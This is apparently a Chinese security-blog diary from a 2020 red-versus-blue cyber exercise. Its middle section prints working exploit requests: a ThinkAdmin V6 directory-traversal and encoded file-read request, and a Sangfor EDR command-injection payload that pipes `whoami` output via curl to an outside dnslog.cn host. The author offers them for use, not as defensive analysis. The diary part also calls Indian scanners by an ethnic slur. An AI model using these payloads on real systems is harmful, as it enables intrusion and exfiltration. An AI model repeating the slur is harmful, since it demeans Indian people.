HW平安夜: 09/16 风平浪静
2020-09-18 15:17:50 Author: www.secpulse.com(查看原文) 阅读量:521 收藏

没人比我更了解攻击队,他们肯定已经写好投降书了。

我想给大家说个消息:“现在攻击方的分数都不低了”

当你还在创作防守日记

突然身后站着一位攻击队选手正在认真的记着桌面上的VPN登录密码....

1、ThinkAdminV6 任意文件操作
Update.php 三个函数未校验访问权限
1、目录遍历注意POST数据包rules参数值需要URL编码
POST /admin.html?s=admin/api.Update/node
rules=%5B%22.%2F%22%5D

2、文件读取,后面那一串是UTF8字符串加密后的结果。计算方式在Update.php中的加密函数。
/admin.html?s=admin/api.Update/get/encode/
34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34

2、深信服EDR 远程命令执行

遇到这样的漏洞反手就是一个赞。

/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9

{"params": "w=123"'1234123'"|curl `whoami`.dnslog.cn"}

0day预警:
拓尔思TRSWAS5.0文件读取漏洞(CNVD-2020-27769)

2020年9月16日 星期三 阴转晴

今天夜班,凌晨2点,发现内网有流量,得到情报说有攻击队向客户内网扔了2个未知0day,客户宁静紧急关停机房,监测平台都打不开了,两眼一摸瞎。

战争已经白热化,没有监测平台,我们防守队依然在,人在客户阵地在,只要我不倒,客户就不会出局。

摸到了兜里的速效救心丸,瞬间安心多了。



今天未免也太平静了吧。
刚来交接班看到今天告警平台的流量只有寥寥无几。
感到非常讶异
大多数都是印度阿三扫描的告警
其中有一条是中国浙江的IP同样也是这种数据包。
我简单分析了一下
这个恶意程序Mozi,如果被入侵成功后
迅速变成僵尸网络的一个节点,最终组建成庞大僵尸网络
很显然浙江的IP已经被控制变成了傀儡机
不断的向其他网段发起扫描
觉有意思的来了
那这次Hvv 会不会升级成一场国际网络战争呢

本文作者:渗了个透

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/141176.html


文章来源: https://www.secpulse.com/archives/141176.html
如有侵权请联系:admin#unsafe.sh